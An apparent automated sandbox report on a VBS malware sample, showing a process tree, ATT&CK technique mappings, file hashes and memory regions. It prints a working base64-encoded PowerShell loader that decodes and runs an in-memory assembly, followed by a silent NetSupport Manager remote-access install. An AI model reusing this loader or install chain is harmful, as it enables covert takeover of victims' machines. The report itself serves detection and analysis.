PID 4788 wrote to memory of 3680	4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe	99
PID 4788 wrote to memory of 2484	4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe	101
PID 4788 wrote to memory of 2484	4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe	101
PID 4788 wrote to memory of 2484	4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe	101
PID 4788 wrote to memory of 2484	4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe	101
PID 4788 wrote to memory of 2484	4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe	101
PID 4788 wrote to memory of 2484	4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe	101
PID 4788 wrote to memory of 2484	4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe	101
PID 4788 wrote to memory of 4940	4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe	102
PID 4788 wrote to memory of 4940	4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe	102
PID 4788 wrote to memory of 4940	4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe	102
PID 4788 wrote to memory of 4940	4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe	102
PID 4788 wrote to memory of 4940	4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe	102
PID 4788 wrote to memory of 4940	4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe	102
PID 4788 wrote to memory of 4940	4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe	102
PID 4788 wrote to memory of 4792	4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe	103
PID 4788 wrote to memory of 4792	4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe	103
PID 4788 wrote to memory of 4792	4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe	103
PID 4788 wrote to memory of 4792	4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe	103
PID 4788 wrote to memory of 4792	4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe	103
PID 4788 wrote to memory of 4792	4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe	103
PID 4788 wrote to memory of 4792	4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe	103
PID 4788 wrote to memory of 2340	4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe	104
PID 4788 wrote to memory of 2340	4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe	104
PID 4788 wrote to memory of 2340	4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe	104
PID 4788 wrote to memory of 2340	4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe	104
PID 4788 wrote to memory of 2340	4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe	104
PID 4788 wrote to memory of 2340	4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe	104
PID 4788 wrote to memory of 2340	4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe	104
PID 4788 wrote to memory of 3252	4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe	105
PID 4788 wrote to memory of 3252	4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe	105
PID 4788 wrote to memory of 3252	4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe	105
PID 4788 wrote to memory of 3252	4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe	105
PID 4788 wrote to memory of 3252	4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe	105
PID 4788 wrote to memory of 3252	4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe	105
PID 4788 wrote to memory of 3252	4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe	105
PID 4788 wrote to memory of 644	4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe	106
PID 4788 wrote to memory of 644	4788	484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe	106

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

Processes:

attrib.exe

pid	Process
1464	attrib.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3568
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs"
  2⤵
  - Checks computer location settings
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:2008
- - C:\Users\Admin\AppData\Local\Temp\484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe
    "C:\Users\Admin\AppData\Local\Temp\484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe" -enc JABBAHEAdwB3AHMAYwAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQAuAFIAZQBwAGwAYQBjAGUAKAAnAC4AZQB4AGUAJwAsACcAJwApADsAJABHAHkAaQBlAHAAZwBrAHcAdgByACAAPQAgAGcAZQB0AC0AYwBvAG4AdABlAG4AdAAgACQAQQBxAHcAdwBzAGMAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ATABhAHMAdAAgADEAOwAgACQAWABzAGwAbQB3AG0AbwBxAGcAawB6ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEcAeQBpAGUAcABnAGsAdwB2AHIALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAEkAdwBxAGIAdwBjACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAIAAsACAAJABYAHMAbABtAHcAbQBvAHEAZwBrAHoAIAApADsAJABFAG0AYgBtAGUAcwBqAHMAbAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQAUgB3AHAAdQB4AHcAYQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACAAJABJAHcAcQBiAHcAYwAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAUgB3AHAAdQB4AHcAYQAuAEMAbwBwAHkAVABvACgAIAAkAEUAbQBiAG0AZQBzAGoAcwBsACAAKQA7ACQAUgB3AHAAdQB4AHcAYQAuAEMAbABvAHMAZQAoACkAOwAkAEkAdwBxAGIAdwBjAC4AQwBsAG8AcwBlACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAgACQAWABzAGwAbQB3AG0AbwBxAGcAawB6ACAAPQAgACQARQBtAGIAbQBlAHMAagBzAGwALgBUAG8AQQByAHIAYQB5ACgAKQA7AFsAQQByAHIAYQB5AF0AOgA6AFIAZQB2AGUAcgBzAGUAKAAkAFgAcwBsAG0AdwBtAG8AcQBnAGsAegApADsAIAAkAE4AZgBrAGYAZwB0AHQAcgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABoAHIAZQBhAGQAaQBuAGcALgBUAGgAcgBlAGEAZABdADoAOgBHAGUAdABEAG8AbQBhAGkAbgAoACkALgBMAG8AYQBkACgAJABYAHMAbABtAHcAbQBvAHEAZwBrAHoAKQA7ACAAJABBAHYAZgBuAHgAdQBrAG4AcgBtAG0AIAA9ACAAJABOAGYAawBmAGcAdAB0AHIALgBFAG4AdAByAHkAUABvAGkAbgB0ADsAIABbAFMAeQBzAHQAZQBtAC4ARABlAGwAZQBnAGEAdABlAF0AOgA6AEMAcgBlAGEAdABlAEQAZQBsAGUAZwBhAHQAZQAoAFsAQQBjAHQAaQBvAG4AXQAsACAAJABBAHYAZgBuAHgAdQBrAG4AcgBtAG0ALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAEEAdgBmAG4AeAB1AGsAbgByAG0AbQAuAE4AYQBtAGUAKQAuAEQAeQBuAGEAbQBpAGMASQBuAHYAbwBrAGUAKAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4788
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\50d669f573135aafd57c..vbs"
      4⤵
      Blocklisted process makes network request
      Checks computer location settings
      System Location Discovery: System Language Discovery
      PID:4620
    - - C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\vrep.msi" /quiet
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2700
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
  2⤵
  PID:1728
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
  2⤵
  PID:3844
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
  2⤵
  PID:3680
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
  2⤵
  PID:2484
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
  2⤵
  PID:4940
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
  2⤵
  PID:4792
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
  2⤵
  PID:2340
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
  2⤵
  PID:3252
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
  2⤵
  PID:644
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
  2⤵
  PID:2924

C:\Windows\system32\cmd.exe
cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\Admin\AppData\Local\Temp\484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe" /Y
1⤵
- Process spawned unexpected child process
PID:1460

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3124
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 3491AE4E981A159F3E67A7ED0A08B06A
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:2676
- C:\Windows\system32\cmd.exe
  cmd.exe /c ATTRIB -R "C:\Users\Admin\AppData\Local\Temp\{CBB68368-7767-4CFF-B3E5-211488346702}\\nsm.lic"
  2⤵
  PID:3520
- - C:\Windows\SysWOW64\attrib.exe
    ATTRIB -R "C:\Users\Admin\AppData\Local\Temp\{CBB68368-7767-4CFF-B3E5-211488346702}\\nsm.lic"
    3⤵
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:1464
- C:\Windows\Installer\MSI6065.tmp
  "C:\Windows\Installer\MSI6065.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EU
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:2452
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 95DAB45EA804E78DFBEFE2923D700012 E Global\MSI0000
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  PID:1680
- C:\Windows\Installer\MSI6483.tmp
  "C:\Windows\Installer\MSI6483.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EU
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:952
- C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exe
  "C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:644
- C:\Windows\Installer\MSI6995.tmp
  "C:\Windows\Installer\MSI6995.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EV"NetSupport School" /EF".\Log Files" /EF".\Bookmarks" /EF".\Tests" /EF".\Store" /EF".\inv" /EF".\Resources" /EF".\Help" /EF".\Image" /EF".\Sound" /EF".\Video" /EA /EX /EC /Q /V /Q /I *
  2⤵
  - Sets service image path in registry
  - Executes dropped EXE
  - Loads dropped DLL
  - Modifies WinLogon
  - Drops file in System32 directory
  - Drops file in Program Files directory
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  PID:4080
- - C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exe
    winst64.exe /q /q /ex /i
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in System32 directory
    - Modifies registry class
    PID:4380
- C:\Windows\Installer\MSI706E.tmp
  "C:\Windows\Installer\MSI706E.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EI
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:4164
- C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe
  "C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe" /Q "C:\Program Files (x86)\NetSupport\NetSupport Manager\Client32.ini"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  PID:2884
- - C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe
    "C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe"
    3⤵
    - Executes dropped EXE
    PID:2588

C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe
"C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe" /* *
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4524
- C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe
  "C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe" * /VistaUI
  2⤵
  - Executes dropped EXE
  - Enumerates connected drives
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  - Checks SCSI registry key(s)
  - Checks processor information in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
  PID:624
- - C:\Windows\SysWOW64\cscript.exe
    "cscript.exe" C:\Windows\system32\Printing_Admin_Scripts\en-US\prnport.vbs -a -r NSM001 -h 127.0.0.1 -o raw -n 65473
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies data under HKEY_USERS
    PID:4216

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s TapiSrv
1⤵
- Modifies data under HKEY_USERS
PID:4896

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Event Triggered Execution

T1546

Component Object Model Hijacking

T1546.015

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Event Triggered Execution

T1546

Component Object Model Hijacking

T1546.015

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Config.Msi\e58533f.rbs

Filesize
41KB

MD5
bd595fec9219beafa4e536e287e46099

SHA1
8d44987157491f3972e5029dfb255337f2305450

SHA256
cde8c2f11cb2d42303158786ca599906aed96254b7ca12f5a1b7b4ee74d42559

SHA512
484c7e7e8e690383660636c08eb100cdc4d9fdfa10024e319a09b1f14f5f2828525af05270f058d3206660d57b49b45b379b7f684b3e056c595aaad9fdd2a97b

Download Submit
C:\Program Files (x86)\NetSupport\NetSupport Manager\WINSTALL.EXE

Filesize
745KB

MD5
0fcf65c63e08e77732224b2d5d959f13

SHA1
5419b79fe14e21d1d5b51fe8187f7b86ec20de74

SHA256
f3e587f94a79c46a603b39286e93b17fabc895c6b71b26b0fc5d812cf155b7e5

SHA512
7c289aaf3ac1b998c8ca9593a58c8aa3a9aa9f41852c1ed4192b908e0ad51871400d585b4fe508d49368bdfc7378807d289971914870a7a47b0410a946e5e381

Download Submit
C:\Users\Admin\AppData\Local\Temp\484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe

Filesize
423KB

MD5
c32ca4acfcc635ec1ea6ed8a34df5fac

SHA1
f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

SHA256
73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

SHA512
6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

Download Submit
C:\Users\Admin\AppData\Local\Temp\50d669f573135aafd57c..vbs

Filesize
2KB

MD5
905ad4c0382eae16df4c0dea8e4d2fcc

SHA1
6597192580595528a3a24cf94c4b44e44cfa6be4

SHA256
49f4e7cdd3716a8e33a6659daa709606a4d74ae84525fa395efd8687f7e9d2ae

SHA512
cc5784d1da871001a838d9ea2ac774cc727cb0d0f8cb76f05ae76fd35fd4bff86bf3418b4abf32f9477f25fbb7710a3fc961072cc95e1a4afd83c7a19dcbaa09

Download Submit
C:\Users\Admin\AppData\Local\Temp\DLL_{CBB68368-7767-4CFF-B3E5-211488346702}.ini

Filesize
7KB

MD5
3330e2d841e410e4e252d1cf3cbe4045

SHA1
8f127bb2c17b9842d43d1c6e335acc56814d5dfd

SHA256
ab1a86f4cf092f2cb713f5024c859ac6562303200cdb66b63465cda70104c499

SHA512
33c5aa201ff8e71d33462fc1976d28897c0ef9b9a6bb863167ef583077fd2c4a3c54bb474358b232095a56f39e672a747a186ef5b4961805166cb6d35e59c59f

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vop3nxdv.q3q.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\vrep.msi

Filesize
39.7MB

MD5
87ef82757aba83e7eb63c7c35dbae97a

SHA1
7418c4ddeecba68e253e89622ad9ca45597d9350

SHA256
79040421b5a48dcc6e611dfe187b2f3e355791ad8511adb84f5c0948aa1d6c89

SHA512
605495995a07d7dfaa5d8f09b9d5bde1e0281b5b6581923b9fbd7c103e5ca9f2bb8dcf8e1049c21bd90ac4d68759270d5453e0414c2f6e1eb3ef877eee1a5533

Download Submit
C:\Users\Admin\AppData\Local\Temp\{CBB68368-7767-4CFF-B3E5-211488346702}\NSM.LIC

Filesize
253B

MD5
d2c2217861f5535686409d80a0867f6f

SHA1
f4d90bebfcf8f501e5b9f0427028f696c3a191c7

SHA256
af9c79cf3af6a7e969208da78dfcfac54d6f956545b46f434d0e447cff94807b

SHA512
656deac03f9d81792e3d78108fb7d6754ca4a21a30f0e8da72e71f64b0b015dfc299d5478a8cc27acb05a0ec7e01c2c1cfcc9eb40041e4fe0a790414e42b4a37

Download Submit
C:\Users\Admin\AppData\Local\Temp\{CBB68368-7767-4CFF-B3E5-211488346702}\product.dat

Filesize
506B

MD5
ff7c0d2dbb9195083bbabaff482d5ed6

SHA1
5c2efbf855c376ce1b93e681c54a367a407495dc

SHA256
065d817596d710d5a06060241acc207b82b844530cc56ff842ff53d8ff92a075

SHA512
ea226b3a55fc59175136f104df497ebf5055624fb1c1c8073b249dfc5e1ed5818a6feee995aa82cf9ed050f1adc7a62994c90b1af03569dfe0d4551ee2bc70c9

Download Submit
C:\Windows\Installer\MSI58E9.tmp

Filesize
169KB

MD5
0e6fda2b8425c9513c774cf29a1bc72d

SHA1
a79ffa24cb5956398ded44da24793a2067b85dd0

SHA256
e946b2fae0b36c43064463a8c16a2774adac30c4188c5af90e9338b903c501c9

SHA512
285bb7759a1214abed36162ac8be2d48df17a05278c4de97562448e20fd43b635563a6819f37e23d92a5f5ed0205a68bffe43dac0d3a67513bd0303b4e7f89aa

Download Submit
C:\Windows\Installer\MSI59B5.tmp

Filesize
511KB

MD5
d524b639a3a088155981b9b4efa55631

SHA1
39d8eea673c02c1522b110829b93d61310555b98

SHA256
03d91c8cd20b846625a092a3dae6a12369930c65d6216a455a00449ebb0dc289

SHA512
84f8ab54122f93a40da08fd83bca767ab49eb0f73c4ab274d9bda11dd09224134df011fa02e5a3abbafcc6fbef6a60673dd48feabdf829a1e22c85a2a759b7ac

Download Submit
C:\Windows\Installer\MSI59C5.tmp

Filesize
487KB

MD5
3085d62326cc1ae4ab21489576973621

SHA1
e3c847dee0ecc7176c1168d6d1df9b9e98b19936

SHA256
d2dc425f47d8c80abd8cadbcd8aa53516e7754c371bd3bad3907294a6ca57c5c

SHA512
f993e4e04b348f7eb346d2f3d00fdaed2212f28ba885bbe50c1959737c5b6cab9cfbe17c4aba992521aa0ecdcf5216fa9e6c36a47746077307d32170223a9a97

Download Submit
C:\Windows\Installer\MSI5A55.tmp

Filesize
153KB

MD5
a1b7850763af9593b66ee459a081bddf

SHA1
6e45955fae2b2494902a1b55a3873e542f0f5ce4

SHA256
41b8e92deba5206c78817236ed7f44df95636ca748d95fab05f032f5aec186af

SHA512
a87a302a9a0d19d7ce293b42f5e7bc09664b21307a5321f226157fcc57eb2df2b59c6651878cb23969a182c82b55e8671ff00f8462194b81a907974a49cb25b1

Download Submit
C:\Windows\Installer\MSI6DAD.tmp

Filesize
244KB

MD5
c4ca339bc85aae8999e4b101556239dd

SHA1
d090fc385e0002e35db276960a360c67c4fc85cd

SHA256
4ab23609cdc64d10b97c9ccb285ed7100f55d54d983cd50762da25ecac4357f9

SHA512
9185ec32545fc838d7fef6c9e4dd222dd02114c661b0b344f16287d55e6571bfe7a4233a852acc579d07bcdbab18c5c034c465b1f4bb78535ed51c3499087fe0

Download Submit
memory/4788-52-0x000000000A980000-0x000000000AF33000-memory.dmp

Filesize
5.7MB

Download
memory/4788-73-0x000000000A980000-0x000000000AF33000-memory.dmp

Filesize
5.7MB

Download
memory/4788-23-0x0000000007080000-0x0000000007116000-memory.dmp

Filesize
600KB

Download
memory/4788-24-0x00000000065F0000-0x000000000660A000-memory.dmp

Filesize
104KB

Download
memory/4788-25-0x0000000006640000-0x0000000006662000-memory.dmp

Filesize
136KB

Download
memory/4788-26-0x00000000076D0000-0x0000000007C74000-memory.dmp

Filesize
5.6MB

Download
memory/4788-27-0x0000000008300000-0x000000000897A000-memory.dmp

Filesize
6.5MB

Download
memory/4788-28-0x0000000007C80000-0x000000000826E000-memory.dmp

Filesize
5.9MB

Download
memory/4788-29-0x000000000A980000-0x000000000AF38000-memory.dmp

Filesize
5.7MB

Download
memory/4788-30-0x000000000AF40000-0x000000000AFD2000-memory.dmp

Filesize
584KB

Download
memory/4788-32-0x000000000A980000-0x000000000AF33000-memory.dmp

Filesize
5.7MB

Download
memory/4788-36-0x000000000A980000-0x000000000AF33000-memory.dmp

Filesize
5.7MB

Download
memory/4788-46-0x000000000A980000-0x000000000AF33000-memory.dmp

Filesize
5.7MB

Download
memory/4788-48-0x000000000A980000-0x000000000AF33000-memory.dmp

Filesize
5.7MB

Download
memory/4788-44-0x000000000A980000-0x000000000AF33000-memory.dmp

Filesize
5.7MB

Download
memory/4788-42-0x000000000A980000-0x000000000AF33000-memory.dmp

Filesize
5.7MB

Download
memory/4788-40-0x000000000A980000-0x000000000AF33000-memory.dmp

Filesize
5.7MB

Download
memory/4788-34-0x000000000A980000-0x000000000AF33000-memory.dmp

Filesize
5.7MB

Download
memory/4788-38-0x000000000A980000-0x000000000AF33000-memory.dmp

Filesize
5.7MB

Download
memory/4788-31-0x000000000A980000-0x000000000AF33000-memory.dmp

Filesize
5.7MB

Download
memory/4788-56-0x000000000A980000-0x000000000AF33000-memory.dmp

Filesize
5.7MB

Download
memory/4788-54-0x000000000A980000-0x000000000AF33000-memory.dmp

Filesize
5.7MB

Download
memory/4788-21-0x00000000060C0000-0x00000000060DE000-memory.dmp

Filesize
120KB

Download
memory/4788-50-0x000000000A980000-0x000000000AF33000-memory.dmp

Filesize
5.7MB

Download
memory/4788-60-0x000000000A980000-0x000000000AF33000-memory.dmp

Filesize
5.7MB

Download
memory/4788-68-0x000000000A980000-0x000000000AF33000-memory.dmp

Filesize
5.7MB

Download
memory/4788-64-0x000000000A980000-0x000000000AF33000-memory.dmp

Filesize
5.7MB

Download
memory/4788-62-0x000000000A980000-0x000000000AF33000-memory.dmp

Filesize
5.7MB

Download
memory/4788-58-0x000000000A980000-0x000000000AF33000-memory.dmp

Filesize
